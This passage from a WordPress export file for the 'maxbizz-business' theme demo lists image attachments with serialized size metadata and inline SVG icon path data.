		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g id="XMLID_2590_"><g id="XMLID_212_"><path id="XMLID_215_" d="m460.459 441.32-86.206-149.314c31.891-30.919 51.747-74.184 51.747-122.006 0-93.738-76.261-170-170-170s-170 76.262-170 170c0 47.822 19.856 91.087 51.748 122.007l-86.207 149.313c-2.023 3.505-1.735 7.884.731 11.093 2.465 3.208 6.622 4.614 10.531 3.563l66.454-17.904 17.722 66.503c1.042 3.911 4.338 6.808 8.351 7.339.44.058.879.087 1.315.087 3.538 0 6.855-1.88 8.657-5l90.698-157.095 90.698 157.094c1.802 3.121 5.12 5 8.657 5 .436 0 .875-.029 1.315-.087 4.012-.531 7.309-3.428 8.351-7.339l17.722-66.503 66.455 17.904c3.91 1.054 8.065-.354 10.531-3.563 2.466-3.208 2.754-7.587.73-11.092zm-354.459-271.32c0-82.71 67.29-150 150-150s150 67.29 150 150-67.29 150-150 150-150-67.29-150-150zm54.076 306.052-14.075-52.819c-.684-2.567-2.362-4.757-4.663-6.085-2.301-1.329-5.035-1.687-7.602-.996l-52.78 14.22 72.221-125.089c24.355 18.556 53.844 30.7 85.933 33.88zm218.188-59.901c-2.567-.691-5.301-.333-7.602.996s-3.979 3.518-4.663 6.085l-14.075 52.819-79.034-136.89c32.089-3.18 61.578-15.324 85.933-33.88l72.22 125.09z"></path><path id="XMLID_885_" d="m193.352 149.609c-2.131 6.565-.384 13.635 4.56 18.451l15.992 15.581-3.769 22.006c-1.165 6.803 1.581 13.548 7.166 17.604 3.155 2.291 6.844 3.454 10.559 3.454 2.862 0 5.739-.691 8.397-2.089l19.759-10.395 19.765 10.384c6.11 3.21 13.374 2.684 18.956-1.375 5.583-4.058 8.325-10.805 7.156-17.607l-3.78-22.005 15.984-15.589c4.941-4.819 6.684-11.89 4.55-18.453-2.135-6.563-7.704-11.256-14.534-12.247l-22.096-3.205-9.886-20.019c-3.056-6.188-9.239-10.03-16.139-10.03-.001 0-.003 0-.005 0-6.901.002-13.085 3.848-16.139 10.038l-9.875 20.024-22.094 3.217c-6.829.996-12.396 5.691-14.527 12.255zm44.706 3.563c3.257-.474 6.072-2.521 7.528-5.472l10.408-21.104 10.42 21.099c1.458 2.951 4.274 4.996 7.531 5.468l23.289 3.378-16.846 16.43c-2.356 2.298-3.431 5.608-2.874 8.852l3.984 23.192-20.832-10.945c-2.913-1.531-6.394-1.53-9.307.002l-20.826 10.956 3.972-23.194c.556-3.244-.521-6.554-2.878-8.851l-16.855-16.421z"></path><path id="XMLID_887_" d="m256 296c69.477 0 126-56.523 126-126 0-51.209-30.58-96.935-77.906-116.493-5.108-2.112-10.953.318-13.061 5.422-2.109 5.104.318 10.952 5.422 13.061 39.817 16.455 65.545 54.927 65.545 98.01 0 58.449-47.551 106-106 106s-106-47.551-106-106c0-43.186 25.812-81.692 65.759-98.098 5.109-2.098 7.55-7.941 5.452-13.049-2.099-5.109-7.94-7.549-13.049-5.452-47.482 19.501-78.162 65.268-78.162 116.599 0 69.477 56.524 126 126 126z"></path><path id="XMLID_888_" d="m256.13 64c2.63 0 5.21-1.07 7.07-2.93s2.93-4.44 2.93-7.07-1.07-5.21-2.93-7.07-4.44-2.93-7.07-2.93-5.21 1.07-7.07 2.93c-1.87 1.86-2.93 4.44-2.93 7.07s1.06 5.21 2.93 7.07c1.86 1.86 4.44 2.93 7.07 2.93z"></path></g></g></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>woocommerce-placeholder</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/woocommerce-placeholder/</link>
		<pubDate>Thu, 01 Oct 2020 10:10:08 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/woocommerce-placeholder.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1163</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:10:08]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:10:08]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[woocommerce-placeholder]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/woocommerce-placeholder.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/woocommerce-placeholder.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1200;s:6:"height";i:1200;s:4:"file";s:37:"2020/10/woocommerce-placeholder.png";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:37:"woocommerce-placeholder-1-300x300.png";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:5:"large";a:4:{s:4:"file";s:39:"woocommerce-placeholder-1-1024x1024.png";s:5:"width";i:1024;s:6:"height";i:1024;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:37:"woocommerce-placeholder-1-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:12:"medium_large";a:4:{s:4:"file";s:37:"woocommerce-placeholder-1-768x768.png";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:37:"woocommerce-placeholder-1-600x400.png";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:37:"woocommerce-placeholder-1-600x600.png";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:38:"woocommerce-placeholder-1-1200x600.png";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/business-consultation/project1/</link>
		<pubDate>Fri, 02 Oct 2020 09:09:53 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1218</wp:post_id>
		<wp:post_date><![CDATA[2020-10-02 09:09:53]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-02 09:09:53]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>773</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1420;s:6:"height";i:1420;s:4:"file";s:22:"2020/09/project1.jpg";s:5:"sizes";a:8:{s:6:"medium";a:4:{s:4:"file";s:22:"project1-1-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"project1-1-1024x1024.jpg";s:5:"width";i:1024;s:6:"height";i:1024;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:22:"project1-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:22:"project1-1-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:22:"project1-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:22:"project1-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"project1-1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:24:"project1-1-1200x1200.jpg";s:5:"width";i:1200;s:6:"height";i:1200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/finance-strategy/project2/</link>
		<pubDate>Fri, 02 Oct 2020 09:10:48 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1220</wp:post_id>
		<wp:post_date><![CDATA[2020-10-02 09:10:48]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-02 09:10:48]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>842</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1420;s:6:"height";i:1630;s:4:"file";s:22:"2020/09/project2.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:22:"project2-1-261x300.jpg";s:5:"width";i:261;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"project2-1-892x1024.jpg";s:5:"width";i:892;s:6:"height";i:1024;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:22:"project2-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:22:"project2-1-768x882.jpg";s:5:"width";i:768;s:6:"height";i:882;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:24:"project2-1-1338x1536.jpg";s:5:"width";i:1338;s:6:"height";i:1536;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:22:"project2-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:22:"project2-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"project2-1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:24:"project2-1-1200x1200.jpg";s:5:"width";i:1200;s:6:"height";i:1200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>target</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/home/target/</link>
		<pubDate>Mon, 05 Oct 2020 07:57:01 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/target.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1247</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 07:57:01]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 07:57:01]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[target]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/target.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/target.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M136.53,207.562c0.446,0.08,0.89,0.118,1.327,0.118c3.564,0,6.726-2.552,7.375-6.183   c6.598-36.951,26.111-70.729,54.946-95.113c29.17-24.667,66.308-38.252,104.571-38.252c40.815,0,79.809,15.224,109.798,42.867   c3.044,2.808,7.791,2.614,10.598-0.432s2.614-7.79-0.432-10.598c-32.767-30.204-75.372-46.838-119.964-46.838   c-41.804,0-82.381,14.844-114.257,41.798c-31.498,26.635-52.816,63.545-60.027,103.93   C129.737,202.938,132.452,206.834,136.53,207.562z"></path>
	<path d="M395.017,329.524c1.897,0,3.797-0.716,5.257-2.151c26.279-25.831,40.752-60.348,40.752-97.193   c0-75.144-61.134-136.278-136.278-136.278c-30.819,0-61.021,10.578-85.044,29.787c-23.652,18.912-40.526,45.458-47.516,74.75   c-0.961,4.029,1.526,8.075,5.555,9.036c4.032,0.962,8.075-1.525,9.036-5.555c6.218-26.059,21.238-49.681,42.293-66.517   c21.683-17.338,47.852-26.502,75.676-26.502c66.873,0,121.278,54.405,121.278,121.278c0,32.789-12.88,63.507-36.267,86.496   c-2.954,2.903-2.995,7.652-0.091,10.606C391.137,328.775,393.076,329.524,395.017,329.524z"></path>
	<path d="M367.008,334.279c-18.747,11.238-40.276,17.178-62.26,17.178c-33.428,0-64.563-13.311-87.672-37.481   c-2.862-2.994-7.609-3.101-10.604-0.238c-2.994,2.862-3.101,7.61-0.238,10.604c25.965,27.158,60.952,42.115,98.514,42.115   c24.7,0,48.896-6.678,69.972-19.313c3.553-2.129,4.707-6.736,2.577-10.289C375.168,333.303,370.561,332.148,367.008,334.279z"></path>
	<path d="M304.748,139.704c-18.697,0-36.643,5.656-51.899,16.357c-14.907,10.456-26.202,24.94-32.665,41.888   c-1.476,3.87,0.465,8.204,4.335,9.68c3.87,1.478,8.205-0.465,9.68-4.335c11.083-29.063,39.434-48.59,70.548-48.59   c41.617,0,75.476,33.858,75.476,75.475s-33.858,75.476-75.476,75.476c-15.522,0-30.43-4.673-43.111-13.515   c-12.404-8.648-21.838-20.637-27.283-34.672c-1.498-3.861-5.843-5.777-9.705-4.279c-3.861,1.498-5.777,5.843-4.279,9.705   c6.527,16.823,17.83,31.191,32.688,41.55c15.21,10.605,33.084,16.211,51.69,16.211c49.888,0,90.476-40.587,90.476-90.476   S354.637,139.704,304.748,139.704z"></path>
	<path d="M120.319,294.523c-3.664-1.934-8.201-0.528-10.132,3.136c-10.091,19.14-23.911,45.353-5.271,71.411   c1.427,1.995,3.713,3.137,6.1,3.137c0.549,0,1.104-0.061,1.655-0.186c2.943-0.666,5.201-3.031,5.729-6.002   c1.514-8.514,8.798-18.489,22.206-30.367c9.176,13.464,21.644,24.868,38.622,35.423c3.039,1.889,6.986,1.369,9.432-1.241   c2.446-2.609,2.709-6.583,0.628-9.492c-13.336-18.643-3.311-37.522,8.297-59.383c10.34-19.473,21.84-41.151,13.625-63.282h51.721   c3.553,19.865,20.946,34.995,41.817,34.995c23.431,0,42.494-19.063,42.494-42.494s-19.063-42.494-42.494-42.494   c-20.87,0-38.262,15.128-41.817,34.992H113.867L79.721,197.25c-1.294-0.964-2.865-1.485-4.479-1.485H7.5   c-3.057,0-5.809,1.856-6.954,4.69c-1.145,2.835-0.455,6.081,1.744,8.205c5.898,5.696,9.147,13.338,9.147,21.52   c0,8.182-3.249,15.824-9.146,21.519c-2.2,2.124-2.89,5.37-1.745,8.205c1.146,2.835,3.896,4.691,6.954,4.691h67.741   c1.614,0,3.185-0.521,4.479-1.485l34.151-25.431h8.604c5.668,9.724,5.769,20.11,0.451,33.965c-1.484,3.867,0.447,8.206,4.314,9.69   c3.865,1.483,8.205-0.448,9.689-4.314c3.859-10.053,7.708-24.167,2.098-39.34h55.631c10.182,17.631,0.635,35.61-10.322,56.246   c-8.297,15.625-17.349,32.67-16.356,50.23c-7.978-7.166-14.203-14.884-19.047-23.522c-1.084-1.932-2.966-3.286-5.143-3.7   c-2.177-0.41-4.424,0.158-6.141,1.558c-12.267,10.01-20.948,18.887-26.546,27.296c-1.776-12.667,4.358-25.971,12.352-41.133   C125.388,300.991,123.983,296.455,120.319,294.523z M304.748,202.686c15.16,0,27.494,12.333,27.494,27.494   s-12.333,27.494-27.494,27.494c-12.56,0-23.172-8.469-26.445-19.995h26.447c4.142,0,7.5-3.358,7.5-7.5s-3.358-7.5-7.5-7.5h-26.446   C281.578,211.154,292.189,202.686,304.748,202.686z M72.755,249.594H22.053c2.871-5.976,4.384-12.568,4.384-19.415   c0-6.846-1.513-13.439-4.384-19.415h50.702l26.071,19.415L72.755,249.594z"></path>
	<path d="M504.5,443.863h-53.2l-41.456-71.217c45.173-33.355,71.947-86.089,71.947-142.469c0-38.807-12.322-75.65-35.633-106.547   c-2.494-3.306-7.197-3.964-10.504-1.47c-3.307,2.495-3.965,7.198-1.47,10.504c21.332,28.273,32.607,61.993,32.607,97.513   c0,53.746-26.574,103.887-71.089,134.129c-10.63,7.233-22.116,13.165-34.149,17.671c-0.38,0.142-0.756,0.297-1.138,0.436   c0,0-0.001,0-0.001,0c-0.001,0-0.001,0-0.002,0.001c-17.781,6.511-36.508,9.813-55.661,9.813c-19.126,0-37.855-3.302-55.664-9.813   c-12.421-4.543-24.298-10.64-35.328-18.138c-2.229-1.501-4.558-3.174-7.117-5.114c-3.301-2.504-8.004-1.856-10.507,1.444   s-1.856,8.005,1.444,10.508c0.7,0.531,1.385,1.044,2.058,1.541l-41.446,71.208h-53.194c-4.142,0-7.5,3.358-7.5,7.5   s3.358,7.5,7.5,7.5h57.43c0.025,0,0.049,0.005,0.073,0.005h54.31c0.023,0,0.045-0.005,0.068-0.005h175.733   c0.023,0,0.045,0.005,0.068,0.005h54.31c0.025,0,0.049-0.005,0.073-0.005H504.5c4.142,0,7.5-3.358,7.5-7.5   S508.642,443.863,504.5,443.863z M397.399,443.863l-24.158-50.375c0.631-0.265,1.257-0.541,1.885-0.813   c0.259-0.112,0.519-0.222,0.777-0.335c1.445-0.635,2.881-1.292,4.309-1.965c0.3-0.141,0.598-0.285,0.897-0.429   c1.42-0.68,2.833-1.373,4.235-2.091c0.049-0.025,0.098-0.049,0.147-0.074c1.435-0.737,2.856-1.499,4.271-2.275   c0.302-0.165,0.603-0.331,0.904-0.498c1.384-0.77,2.759-1.555,4.121-2.361c0.206-0.122,0.411-0.248,0.617-0.371   c0.665-0.398,1.331-0.793,1.991-1.2l36.55,62.787H397.399z M359.112,398.716l21.651,45.147H228.729l21.659-45.15   c17.515,5.648,35.768,8.515,54.362,8.515C323.367,407.228,341.62,404.361,359.112,398.716z M212.108,381.047   c7.734,4.76,15.815,8.915,24.16,12.421l-24.175,50.395h-36.546L212.108,381.047z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>profit</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/home/profit/</link>
		<pubDate>Mon, 05 Oct 2020 07:57:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/profit.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1248</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 07:57:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 07:57:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[profit]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/profit.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/profit.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M54.754,149.62h87.326l-29.633,43.741c-2.323,3.429-1.426,8.092,2.003,10.415c3.43,2.322,8.093,1.427,10.416-2.003   l35.332-52.153h48.731l81.4,120.155c1.45,2.14,3.812,3.294,6.216,3.294c1.448,0,2.911-0.419,4.2-1.292   c3.429-2.323,4.326-6.986,2.003-10.415l-80.751-119.196l48.252-69.697c6.55-9.462,7.301-21.671,1.96-31.864   S256.402,24.08,244.895,24.08H124.232c-11.508,0-21.974,6.332-27.315,16.525s-4.59,22.402,1.96,31.865l31.663,45.734L66.664,80.396   c-3.565-2.109-8.164-0.93-10.274,2.634c-2.11,3.564-0.931,8.165,2.634,10.274l69.801,41.315h-74.07c-4.142,0-7.5,3.357-7.5,7.5   S50.612,149.62,54.754,149.62z M110.204,47.567c2.785-5.314,8.029-8.487,14.028-8.487h120.662c6,0,11.244,3.173,14.028,8.487   c2.785,5.313,2.408,11.432-1.007,16.364l-48.938,70.688h-48.828l-48.938-70.688C107.796,58.999,107.419,52.881,110.204,47.567z"></path>
	<path d="M393.083,250.087c-65.571,0-118.917,53.346-118.917,118.917c0,36.209,16.273,68.685,41.883,90.514   c-13.427,8.683-29.198,13.402-45.309,13.402H98.39c-22.276,0-43.217-8.674-58.967-24.424C23.674,432.747,15,411.806,15,389.53   c0-16.737,4.962-32.908,14.349-46.764l78.52-115.899c2.323-3.43,1.427-8.093-2.002-10.416c-3.429-2.322-8.093-1.427-10.416,2.002   l-78.52,115.899C5.854,350.701,0,369.781,0,389.53c0,26.282,10.234,50.99,28.817,69.573c18.582,18.582,43.291,28.816,69.573,28.816   h172.35c20.862,0,41.245-6.703,58.015-18.945c18.557,11.982,40.644,18.945,64.328,18.945C458.654,487.92,512,434.574,512,369.004   C512,303.433,458.654,250.087,393.083,250.087z M393.083,472.92c-57.3,0-103.917-46.616-103.917-103.916   s46.617-103.917,103.917-103.917S497,311.704,497,369.004S450.383,472.92,393.083,472.92z"></path>
	<path d="M470.074,327.032c-1.986-3.635-6.542-4.972-10.177-2.986c-3.635,1.985-4.973,6.542-2.987,10.178   c5.787,10.595,8.846,22.621,8.846,34.78c0,40.072-32.601,72.673-72.673,72.673s-72.673-32.601-72.673-72.673   s32.601-72.673,72.673-72.673c16.979,0,33.497,5.978,46.512,16.831c3.181,2.653,7.911,2.224,10.563-0.956   c2.653-3.182,2.225-7.911-0.956-10.563c-15.706-13.098-35.636-20.312-56.119-20.312c-48.343,0-87.673,39.33-87.673,87.673   s39.33,87.673,87.673,87.673s87.673-39.33,87.673-87.673C480.756,354.34,477.063,339.826,470.074,327.032z"></path>
	<path d="M393.083,426.906c4.142,0,7.5-3.357,7.5-7.5v-7.827h2.454c13.806,0,25.038-11.232,25.038-25.038   s-11.232-25.037-25.038-25.037h-19.908c-5.535,0-10.038-4.503-10.038-10.038s4.503-10.038,10.038-10.038h29.192   c4.142,0,7.5-3.357,7.5-7.5s-3.358-7.5-7.5-7.5h-11.738v-7.827c0-4.143-3.358-7.5-7.5-7.5s-7.5,3.357-7.5,7.5v7.827h-2.454   c-13.806,0-25.038,11.232-25.038,25.038s11.232,25.038,25.038,25.038h19.908c5.535,0,10.038,4.503,10.038,10.037   c0,5.535-4.503,10.038-10.038,10.038h-29.192c-4.142,0-7.5,3.357-7.5,7.5s3.358,7.5,7.5,7.5h11.739v7.827   C385.583,423.549,388.941,426.906,393.083,426.906z"></path>
	<path d="M332.578,156.935l5.861-4.688v68.76c0,4.143,3.358,7.5,7.5,7.5s7.5-3.357,7.5-7.5v-68.76l5.861,4.688   c1.383,1.106,3.037,1.644,4.68,1.644c2.2,0,4.38-0.963,5.861-2.814c2.588-3.235,2.063-7.954-1.171-10.542l-18.046-14.437   c-0.019-0.016-0.042-0.025-0.061-0.041c-0.315-0.248-0.648-0.473-1.001-0.668c-0.007-0.003-0.013-0.008-0.02-0.012   c-0.339-0.186-0.696-0.339-1.064-0.472c-0.05-0.018-0.1-0.038-0.15-0.055c-0.347-0.116-0.704-0.207-1.071-0.272   c-0.065-0.011-0.129-0.02-0.193-0.029c-0.368-0.056-0.741-0.093-1.124-0.093s-0.756,0.038-1.124,0.093   c-0.065,0.01-0.129,0.018-0.193,0.029c-0.367,0.065-0.725,0.156-1.071,0.272c-0.051,0.017-0.1,0.037-0.15,0.055   c-0.368,0.132-0.725,0.286-1.064,0.472c-0.007,0.004-0.013,0.009-0.02,0.012c-0.353,0.195-0.686,0.421-1.001,0.668   c-0.02,0.016-0.042,0.025-0.061,0.041l-18.046,14.437c-3.234,2.588-3.759,7.307-1.171,10.542   C324.624,158.997,329.342,159.522,332.578,156.935z"></path>
